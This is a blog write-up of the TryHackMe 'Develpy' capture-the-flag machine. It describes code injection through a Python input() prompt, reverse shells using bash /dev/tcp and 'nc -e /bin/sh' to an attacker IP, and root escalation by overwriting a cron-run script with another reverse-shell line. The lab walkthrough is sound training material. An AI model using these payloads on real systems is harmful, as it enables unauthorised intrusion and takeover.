---
layout: post
title:  "THM - Develpy"
date:   2020-10-07 20:00:00 +1100
category: hacking
---

## Introduction
*boot2root machine for FIT and bsides Guatemala CTF.*

Not much to go on here. This one is Medium rated. Let's begin.

## Ports
Nmap says we've got two ports only - SSH on 22 and a mystery port on 10000.

Visiting port 10000 in Firefox presents the following message:

>Private 0days  
Please enter number of exploits to send??: Traceback (most recent call last):
  File "./exploit.py", line 6, in <module>  
    num_exploits = int(input(' Please enther number of exploits to send??:   '))  
  File "<string>", line 1, in <module>  
NameError: name 'GET' is not defined  

So it looks like a python application of some sort that we don't interact with via a brower. We'll move on to netcat.

## Netcat

{% highlight shell %}
root@kali:/opt/tryhackme/develpy# nc 10.10.97.246 10000

        Private 0days

 Please enther number of exploits to send??: 1

Exploit started, attacking target (tryhackme.com)...
Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.011 ms
{% endhighlight %}

So what's going on here is we enter some number, and we get that number of pings. Now we have to break it.

## Breaking it
I tried a few different things; some things produce this message as part of the error:

>num_exploits = int(input(' Please enther number of exploits to send??: '))

So we can see the value being input being cast to an integer with int - actually we saw this earlier when we visited the port in the browser. Trying a few different data types produces more error messages, indicating it wants a *string* or *integer* as the expected input. After a bit I tried this:

``
__import__('os').system('bash -i >& /dev/tcp/10.9.10.123/1234 0>&1')#
``

Which prompted this error:
>sh: 1: Syntax error: Bad fd number

And this indicated that the command was being executed by the system but not being understood (using **sh** not **bash**). The next one I tried was:

``
__import__('os').system('nc -e /bin/sh 10.9.10.123 1234')
``

And I was on the box.

## On the box
Our user is called *king*. Checking /etc/crontab we can see:

>*  *	* * *	root	cd /home/king/ && bash root.sh

So we have root running a script in our home directory. Nice. We can overwrite the script with our own - I deleted the original and replaced it:

``
king@ubuntu:~$ echo '#!/bin/bash' >> root.sh
``

``
king@ubuntu:~$ echo 'nc -e /bin/sh 10.9.10.123 1235' >> root.sh
``

Since we know this shell already works, we might as well user it again with a different port number, right? With a new listener we get a root shell and it's all done; thanks for playing.
